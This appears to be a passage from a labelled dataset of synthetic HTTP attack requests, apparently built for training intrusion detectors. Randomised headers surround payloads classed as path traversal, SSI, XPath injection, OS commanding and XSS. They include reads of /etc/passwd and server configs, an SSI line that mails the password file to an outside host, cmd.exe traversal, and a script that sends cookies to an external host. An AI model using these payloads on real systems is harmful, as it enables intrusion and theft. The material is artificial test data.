UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 198.152.150.100
X-Serial-Number: 03181480810
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47921
Start - Id: 46096
class: PathTransversal
POST /Sduzr/eMsrtutoi/stsa3reoterftrsE/3it/7kzi9-2IMEsgws@/imgRjLB..tiff? HTTP/1.1
Content-Length: 108
Content-Language: ee,a1I,tc
Content-Encoding: compress
Content-Location: /acoRnha.exe
Content-MD5: ZWU3a2kwbmJMcmhlaGRsbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Feb 10 13:11:49 UTC
Last-Modified: Wed, 25 Jun 08 02:14:13 CET
Host: www.qwsenMo1.fr
Connection: ole6
Accept: audio/x-wav, image/png;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, gzip, identity;q=0.1, deflate
Accept-Language: ge6Mroe8-nb5;q=0.1, au-itaE, rrfnnri-aohs9w;q=0.1
Cache-Control: max-stale
Client-ip: 92.99.137.196
Cookie: 4e7=ayDv;saardirdr=etsh;tbE5ofoswql=7
Cookie2: $Version="0"
Date: Sun, 18 Sep 05 24:58:06 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: 1riwi
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Fri, 23 Oct 09 10:00:17 CET
If-Match: "ZR@RO@ard44m.o."
If-None-Match: *
If-Range: ".K5SgDfV0JkuNSNbf_g"
Max-Forwards: 9
MIME-Version: 4.9
Pragma: rthecb=o35
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Range: 43-
Referer: http://ievnye.de/yiEhm.shtml
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: cajl (eGmtlaO)
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: hsde
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gCbgsoundRKON-I=357505&satsend5t=3enetlutouM&renna2Svtetnsil=uoeuahnvefx1&elfaul=/etc/httpd/httpd.conf

End - Id: 46096
Start - Id: 40309
class: SSI
GET /i2/ix7AoK0sV3J/oYK/9tn/pz1natcefdx/qCYgYM0kzo/iZImKDqk5/3mgep9OlUe8sN.jsp?rco=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cmydt%5Cewa3we3d%5Crases.exe++d%3A%5CNadae%5Cwww.isnemearel.org%5CneidUniot%5Cdatabase.mdb+++%2Fx+exporttofoxpro%22--%3E HTTP/1.1
Host: www.kteyuei.cz
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 189.175.1.221
Cookie: tdauCHbhbh2=nxhg\libd;eg2we78ye=nOsystemnnt Ln;voib0iemeo5s=eZo;Ht3ecemiua=qybk4E4OB2;3ecyLie3iR=3;object-J1M3YV@PT-=d@L6sjDw
Cookie2: $Version="373"
Date: Mon, 04 May 09 08:28:52 CET
ETag: W/"ko4dHKFzFsOi3L6r9_hf"
Expect: 100-continue
From: eeom@9Ehl.gov
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Wed, 03 Sep 08 20:37:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 44
MIME-Version: 3.6
Pragma: k1ih5L=eerhtEq
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: Digest nc=c473921A
Range: -2115,0045-233,-51
Referer: http://www.sh2uy.biz/cMtAo.css
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (compatible; Konqueror/3.1; Linux i586; weshnDht; seea)
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0424x470
Via: 0.3 78.171.60.206
Transfer-Encoding: deflate
Upgrade: llx/6.8, susFt/0.9, sep2er/8.1, fxahr/9.5, oEs/3.3
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40309
Start - Id: 40106
class: SSI
GET /nooocna/g-8peS/tXVoIlt7132I/omn97/srsi/iP.asmx?emelvssss7ie=%3C%21+++%23%3C%21--++%23exec+cmd%3D%22id%22--%3E&gSolom=tx3rbhgc&ect21j=ra&dHA.0qpriF=20&hsiltfifH3eIfe=+&2.OA0QRfXNY=nrsegcnjnv&md=s3tsna&8eftcuacon5rot=gneormfoh4y&kAXZQP2dZad5=89&2oru1Bebtsaep=ev&LLlnruh0ytayd=43494&j4anc=960407617&h5us=2368788538 HTTP/1.0
Host: 179.210.146.56:34
Connection: keep-alive
Accept: application/*, application/zip;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=3
Client-ip: 113.207.135.168
Cookie: aanqW4u=44823;h8ih7qk3e=22554182;Hifdelxsteiedl=i9isstwsT2t;rAi9Hsngfshvtii=+lnl1k;arzoegqlrTnqw=zRtgy
Cookie2: $Version="674"
Date: Fri, 11 Nov 05 22:05:52 UTC
ETag: W/"aBKdxlbr.ECzHxyEdr"
Expect: 100-continue
From: ihPoede@2hepettfu.be
If-Modified-Since: Mon, 06 Aug 07 24:54:10 GMT
If-Unmodified-Since: Thu, 17 Nov 05 07:52:05 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Jan 05 02:28:29 UTC
Max-Forwards: 8035
MIME-Version: 0.3
Pragma: mnwL='x'
Proxy-Authorization: rxlppx muowon6=meWd
Authorization: Basic amVUbmU6dGVncmhy
Range: 12545-4
Referer: http://ot5b5co.org/hryaaO/sPed2at/4sU0/ntsqrjOp/Oo4fdtc.msf
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 8.0; dy-5j; rv:5.2.1) Gecko/02005397
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6612x3935
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 525 47.98.135.216 "dlaiinerst" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40106
Start - Id: 39488
class: SSI
POST /fWnU9n6y4h/uCnnrbtmeeitub/Y2wy4u7/efcja2rh/nQQZ_aoyXP4CIJw.jpg? HTTP/1.1
Content-Length: 216
Content-Language: I,nendaF5,t
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 May 06 22:06:35 UTC
Host: 177.199.73.187
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1253, iso-8859-6;q=0.0, euc-cn, iso-8859-15, utf-7
Accept-Language: *;q=0.6
Cache-Control: min-fresh=17827
Cookie: zs8dtetm=<!-- #exec   cgi="/cgi-bin/script?oh"    -->;B.-jm=oa25c4b;nlttrrOtvrxitmT=ohut;vLi_nNg=39330252;anl=|childtqiw
Date: Sat, 19 Jan 08 12:58:25 GMT
If-Modified-Since: Wed, 26 Aug 09 10:59:59 UTC
If-Unmodified-Since: Tue, 30 Mar 04 01:06:53 UTC
If-Match: *
If-None-Match: *
Pragma: no-cache
Referer: http://www.dwrt.de/rtsuaoh/cihto/Dutoo/uccmai1.gif
User-Agent: Mozilla/7.1 (X11; U; Linux i586 9.1; 1s-oi; rv:6.3.0) Gecko/62488616
Warning: 699 www.3fdki.tiff "lopbn9not7fdynweolle" "Thu, 01 Feb 07 09:36:30 UTC"
X-Serial-Number: 48967
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dyteeCdes=48530639&sccaXg=u8.t&entonhpttnoa=0&4adeAqcshthn=ott&plR-=netcatelEwtufatmp&teN1us=b.bFL07&hnea1StFde=ol  &1essjrbeAroso=pcees4esiig&Ng=egroup byd&side1abbUa0wi4t=427949&Yyyyntaujumm=158507591&clinkjEC=9ehs

End - Id: 39488
Start - Id: 49192
class: XPathInjection
GET /uTw8dl2vWE6dBSZ/a57EB6pIBQzpgVkdlb/gytuesoasoaAjaotrau/eNJP/tmwWs_@i5CNIKcoi/aj6EifVfsskt33hW/oXx3dp-B0oDDhkMGxhb/rOljQ.cgi?r6vaoealheed3e=l3al%27++or++++ttgdNd%2Feam%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D78%5D+++++or+++++%27bs%27++++%3D++%27&eaitiaee3b9=%7Cp%25gninehedivobject%40%5Db&Oxi=hZtNxtaeseHa&5sibIfjheor=n+Ee&fhedowNtcs=h7VmmfL&enotoE=ttOh&3zzhJBKU5=ezechoninirmoTl62s&osbYcyrsai=r84BEvg5&ruenad=etg HTTP/1.1
Host: 181.177.5.49
Connection: elvAei1w
Accept: video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.0, deflate
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 71.213.164.209
Cookie: cfee=iinclude;trsoeaueen=000;oncpmtdthhfss=263558570
Cookie2: $Version="8"
Date: Sat, 12 Nov 05 03:41:59 UTC
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: oSmxlt
From: ir0psea@aO25fruan.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Thu, 17 Nov 05 05:04:01 GMT
If-Match: *
If-None-Match: "3LQ-hCF@CZ49KdqdAEaW"
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 1
MIME-Version: 7.4
Pragma: odoa=ho
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: NTLM TmVhZWNyaTJvOWJBdWFhOTdwVXdzMUtjY3VzZTVncnM3cWU=
Range: 87-,-69535,7135-70843
Referer: http://hrtoaee.cz/yamh/eelcn/inuwu.avi
TE: trailers
Trailer: Accept
User-Agent: 9gbnmhgOLr/3.1.3.5
UA-CPU: x86
UA-Disp: 803,830,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: HTTP/7.6 www.8usidNes.css, 9.3 www.rstocu.png
Transfer-Encoding: identity
Upgrade: aon0s/0.1, r0iia/0.9, 2qnen/0.1, yadio/5.6, tezWs/1.2
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49192
Start - Id: 49029
class: XPathInjection
GET /98J.var/wmmbaHe/7lsiIeaoroISorx/azUandT/leitiis1sgstraPos1.mspx?srhsksinti=8763&iadwsuntytagSw=ar0bn0tws&ysyeNdrgeeNdg=K&XuQPrmJ=8o9cosBm7U&reeanloxlldanr=wysaCCx3&8lLhpa=su20&Cw9hsystemX=5555++++or++++stk%2Fm%2Ftlptoc%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D980%5D+or+++++130%3D&ae8t8eaNhemlO=0CrAJ4O6&Wh3orndlo=z9sutsei3 HTTP/1.1
Host: 85.49.177.110
Connection: nim52d
Accept: image/*;q=0.1, application/*, text/*;q=0.0
Accept-Charset: gb2312
Accept-Encoding: gzip
Accept-Language: *;q=0.0
Cache-Control: min-fresh=1
Client-ip: 172.221.103.89
Cookie: YlAe=e1aernratohami;hiic=hW.0d@gw;ar=52371;O9abpidxEaRApAz=8witrso;5gVwPxMX4=43503
Cookie2: $Version="88"
Date: Thu, 27 Nov 08 09:40:18 UTC
ETag: "n69p-tk6OwCMUhRX"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 24 Feb 08 15:12:50 UTC
If-Unmodified-Since: Fri, 16 Jul 04 18:54:37 CET
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic Z2ljb2NzOm5mZWVhbg==
Range: -31
Referer: http://godcb8de.uk/a8to/elroo.bin
TE: deflate;q=0.7,gzip;q=0.9
Trailer: Pragma
User-Agent: rT80QCZX http://www.else.uk
UA-CPU: 68000
UA-Disp: 913,4010,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1840x9062
Via: FTP/4.4 203.81.59.135
Transfer-Encoding: compress
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49029
Start - Id: 43673
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 118.28.66.131
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=3
Client-ip: 158.250.190.86
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Mon, 26 Feb 07 20:28:54 CET
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "uZEImgwAnn6.GHfE8NC"
If-None-Match: "Awge4HWHkOQfguVPn-"
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 2532
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest username="gvaaal"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /2l9Wt/rrI9use/l0xnhriw.php
TE: chunked;q=0.2,deflate
User-Agent: Mozilla/4.1 (Windows; U; Win98 0.3; ds-0o; rv:6.5.9) Gecko/23254360
UA-CPU: x86
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43673
Start - Id: 43948
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 169.204.130.42
Connection: ahmOot
Accept: audio/basic;q=0.9, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: A-t0a, yOoi-nq, neciamr3-rsir1
Cache-Control: max-age=44655
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="790"
Date: Wed, 30 Jan 08 24:56:41 GMT
ETag: "Nd4SKGTA_nnaZTH0"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Fri, 24 Nov 06 17:25:07 GMT
If-Match: *
If-None-Match: "dkv3Qez@TTTsAdA0Of@"
If-Range: "rU0p8lol0k8cG.PieMo"
Max-Forwards: 28
MIME-Version: 3.4
Pragma: rCtm=sasabdy
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM ZGllc2V2TGV0YW1hc25vdGVoaXFvcGFqZTVBOGVTYmVh
Range: 2091-214
Referer: http://irrdamwn.uk/ztenttaf.wmn
TE: gzip;q=0.5,trailers,trailers
Trailer: Via
User-Agent: net9lxmstl (elwMEa; g6BTNRbMx; 3OCbmtQ; sl8W4hrD8N; e1NUW3jA)
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: FTP/6.5 173.207.86.37:19, 8.1 www.et7on6ie.html, 2.0 254.93.181.148
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43948
Start - Id: 40203
class: SSI
GET /iHQal.YxKhz.d@SjECy/8UrI-t1m@Fct91L6/ie/rhac1t5dp/KLkyTEttU/OzdropIRQ/mFKkdwsdE2/6kh9mvtae/httnkhdnym9/lr3v0ahdyTZ@j-4/o..c02KqziT3JFv/4_InKkWxrE.html?Aun@=c+nftpo7deleteo5Tas-og%40tr&enorDlig2=73956&niaeeedae=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail+++eSiUpuat4.com++%3C++++%2Fetc%2Fpasswd%22--%3E HTTP/1.0
Host: www.ereoe.st:80
Connection: keep-alive
Accept: audio/basic;q=0.0, image/*
Accept-Charset: isiri-3342, iso-8859-8, shift_jis;q=0.3, iso-8859-4;q=0.4
Accept-Encoding: deflate;q=0.9, deflate, deflate;q=0.4
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 151.249.122.44
Cookie2: $Version="808"
Date: Tue, 22 Nov 05 17:48:55 GMT
ETag: "h6GFeI6Xpx0R31tNI"
Expect: ystte=htertDv;cidygTg=edbp
If-Modified-Since: Fri, 06 Apr 07 18:10:45 UTC
If-Unmodified-Since: Sun, 22 Oct 06 17:56:36 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Jun 07 17:29:15 UTC
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: Basic M2l0bzplYXNo
Authorization: Digest algorithm=eb2rrtle
Referer: http://asygavi6.ch/3twfdN2.tar
TE: chunked;q=0.8,trailers
User-Agent: t.D-f1VkR http://www.sse0t6.it
UA-Disp: 9617,113,16
UA-Color: color8
UA-Pixels: 3172x5893
Via: neq4d/5.4 www.ooada.htm, 0.2 www.Bhamo.jpg
Transfer-Encoding: identity
Warning: 521 www.ath5rism.css "eawurun6gY" "Sun, 07 Dec 08 03:40:09 GMT"
X-Serial-Number: 51284681633
----: -------------------------------

null

End - Id: 40203
Start - Id: 39149
class: SSI
GET /3hhltmoyrb/iEYMjnMu.lD10kpMG/F32l/hwrbnne/UDnX07xFuvOXz1/iNLyo/rjJORrFx@/rS/oihohneAetlhk8/fNrGaqbvF/eBPVt6_jNh.4Uy@t0fh@.png?0qBE9l=68050429&eFena5imG=eRj&JBDx201fpasswd.=8067588&ita0Meits9nhp6i=eIitl&st0h5S=+7s8&hisven4hd=tqtacrctaeokt0wsah&iwriTb=ueta&bht3dcwe=orerlik9&H9es=Sur4llt&sdf=0638356&xmhDcYpJ=541&ies=6673&hemhaOeily=ons&0MTlocation2dOJ=4729&ba=8 HTTP/1.0
Host: www.aGortapsx.com:80
Connection: vTotlrta
Accept: */*
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 70.242.99.139
Cookie: nkweeisjadd=<!--   #exec   cgi="/cgi-bin/script?bttn"   -->
Cookie2: $Version="129"
Date: Fri, 18 Feb 05 20:46:35 GMT
ETag: W/"Fk-Y-4pUDYfvKJYwN"
If-Modified-Since: Fri, 09 Sep 05 08:50:45 UTC
If-Match: *
If-Range: "WsBeGLdO7uWLtKp"
Max-Forwards: 6515
Pragma: hFtOe=alsei
Proxy-Authorization: NTLM ZFZ0d3NibnllNGxXZXJsZFVxbmZyTWEzU3R5bmQwem5paWhvc2F0aWEwcm9ldWE=
Range: 223672-,810-
Referer: http://idydne.net/ler1.exe
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 6.6; vc-HN; rv:2.5.8) Gecko/01556271
UA-CPU: StrongARM
UA-OS: Solaris
UA-Pixels: 3819x400
Transfer-Encoding: identity
Upgrade: eeey/9.3
X-Forwarded-For: 83.220.235.130

null

End - Id: 39149
Start - Id: 35654
class: XPathInjection
GET /x@/9boaMb6YGqhchild/sxbOdHWQ6_ldR2Ja-Wm/osrcihoIhnt/0oee.gif?echaPeeoeie=cGh&V1owinntqstdin=dOde&oroi8=%3Baishtaccesutnf%25ng&dhfgehvarhafc0=801909&JNvIyxosystemffA=qoiahfafSeoo+kq&mp7=68705+++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++389%3D&z0JfYmTgzFks=uxagzD&dcc9u3itltaaor=tbeuycSnnheehe HTTP/1.0
Host: www.n8c2M.be:424
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, compress, compress;q=0.7, compress;q=0.0, compress;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 58.89.125.179
Cookie: ajebwsdtolEo6t=stdinorcdy7oe;t7otzynr9=eerrpE;q27te=tVWNvZ29_r;shutdownLj6%u4cF7telnet.I=hnrcdrahhta;Ke=64;nres=m
Cookie2: $Version="449"
Date: Tue, 01 Nov 05 12:07:37 GMT
ETag: "UDJxFP191jf5i2WY"
Expect: 100-continue
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Tue, 04 Apr 06 10:00:44 UTC
If-Unmodified-Since: Wed, 20 Feb 08 04:32:40 UTC
If-Match: *
If-None-Match: "ELB9rkq_.Cv9cLxCfC1"
If-Range: Thu, 28 Oct 04 20:44:04 GMT
Max-Forwards: 6
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZGFueG1ocnRnZnRvNGFjRXVkc3JoZW5Oc0xlZWwzYWtuZVl3
Authorization: tpct Qeea=aleyeri8
Range: -93
Referer: /bNmYnO5a/tEseee/haOh/eseihi0s.png
TE: trailers,gzip,trailers
Trailer: User-Agent
User-Agent: sTvrMzntF http://www.ziLn.net
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8105x4373
Via: 9.0 149.23.27.251, 0.1 224.173.159.79:301
Transfer-Encoding: compress
Upgrade: deki/7.7
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35654
Start - Id: 35022
class: SSI
POST /xCechounion/aeggageapSfunatlOI/nmyKcIg8VUNvnGzJazGx.msf? HTTP/1.0
Content-Length: 60
Content-Language: ish
Content-Encoding: compress
Content-MD5: N29kdWF3dHNocnVvMEVmbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Oct 08 09:28:44 GMT
Last-Modified: Fri, 13 Aug 04 15:10:19 UTC
Host: www.mnsDytkr.gov
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Cache-Control: Prt=rrenvp
Client-ip: 112.132.142.11
Cookie: srsf4NasSvl32=<!--#odbc     statement    =   "select    lrse8t,     rnhfares, ateancux  from    agidg9n1     order  by  0,  98,     0"    -->;i6aoeterddatbyt=eaeAd
Date: Wed, 11 Mar 09 03:53:26 CET
Max-Forwards: 4549
Referer: http://eteokdl.fr/Leir6/ye5e.pdf
TE: chunked,trailers
User-Agent: Mozilla/1.6 (X11; U; Linux i386 6.8; x0-iu; rv:5.3.8) Gecko/64828790

ainOt=gmdmnsaeyaeotw&rlrio=86110488&uolidilny5LlD=5739148177

End - Id: 35022
Start - Id: 36043
class: PathTransversal
GET /mfhk6kvPVk/L8moen2hn/ovOf_@RepR@wEMHBule/elErDoeetoSls/nIMiFaEhGfurBVPy-_jf/csniea5wonmn/eQuaFPxqMNLC0@zG/s6e/08OQW7gyGSns9Eoq3..nsf?icyrlxiLiopndn7=soKaRo&Cnnudia5obr=esvBUP9&hnnnn=5polioseEnz&laarphsil=70&90b61shutdowno6IM=+&aga=rDKXm%40XjKVST&nidelaor2hw=meh2hl8y&3VE.mailtmpQ=aiy+a&2eshutdownDTx8=ewz47Wh3&jus9ouetasy=%5BbhEoe%2B&FwPjHg=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&HKaoc@7eFi=0188409 HTTP/1.1
Host: www.rT1utqa7pi.org
Connection: keep-alive
Accept: video/mpeg, audio/basic;q=0.6, application/postscript;q=0.7
Accept-Charset: koi8-r;q=0.8, iso-8859-6;q=0.6
Accept-Encoding: deflate
Accept-Language: G-duz0, etrofe-hsgbNele;q=0.8, 5p9povnq-assaides, 0o-pe, ran9r-Ner;q=0.2
Cache-Control: max-stale=61667
Client-ip: 59.23.8.230
Cookie: gtdoEo=7KBxF;Cha4r4xojRe8dsr=101392;ND4formh-Ls2telnet=b hobexect?0certotsB;titlAsjhirun=pfL1xetaieee8a8Xd;eettp=61921
Cookie2: $Version="0"
Date: Wed, 12 Oct 05 07:23:19 CET
ETag: "n-8upU_gq4.C0q_yXO"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Sun, 09 Oct 05 06:14:06 CET
If-Unmodified-Since: Tue, 29 Aug 06 24:10:42 CET
If-Match: "cpJg7Avs94O@02kroeWj"
If-None-Match: *
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 7
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="cK41eie"
Range: 709-485
Referer: /gbuptqm9/tlepCNe.css
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.1 (Windows; U; WinNT 2.8; uf-hl; rv:9.8.3) Gecko/75186623
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.7 www.aunei.gif
Transfer-Encoding: nmmute; ihiem6cs=aes3ofsm
Upgrade: sopds/5.7, hnnohu/8.0, bog/2.3
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36043
Start - Id: 47463
class: XSS
GET /ohhettyimewoa4nnu/5Acj/fio0itibencaAe/tKjeqLj/x_v/VsvG/erc/Lsxp_QljBvAservicesgi8/NZbL_inputuPiRd22/w1E99_NUGBK5dUjMtd.htm?Tsiuonio=o&arpkZtliOiad=1mailii&tal1gks3mw9tSn=4545&ndtKccee=%3B%29uqarglogrrniscriptDr&6rrejsuooo=m-ow&hUt2ibzsca=euodtthleeebbe2&toDe7mia=a%24c&dErieigybteyi=96912860&jyspwem=105&CAL4VOAL4position=++9%24&QSs_o5iWyz=%3Cimg+++src%3D%26%7B%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.icmandne.com%2Fcgi-bin%2Fsi.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E&G7eerh6et6=tdd&bha6sna=p HTTP/1.0
Host: www.eotanreosi.de
Connection: ba47Mid
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: y-RmfrtNs;q=0.1
Cache-Control: no-transform
Client-ip: 146.143.28.253
Cookie: hlceiHdePz=519;ntdlyesthIpi=bftLsY9;eeAnico=11;stoanepeammsnd=;n7tdropmteh;i42i0ojTso=i\;ceAtaynlhtaehp=ehtgroup byeLh
Cookie2: $Version="305"
Date: Thu, 04 Jun 09 09:00:00 UTC
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Fri, 29 Sep 06 12:24:47 CET
If-Match: "dsqezla3Zlk5Dna"
If-None-Match: "M7czOFF0rqRWWmbzJj"
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 9988
MIME-Version: 8.7
Pragma: iiu=rioxn
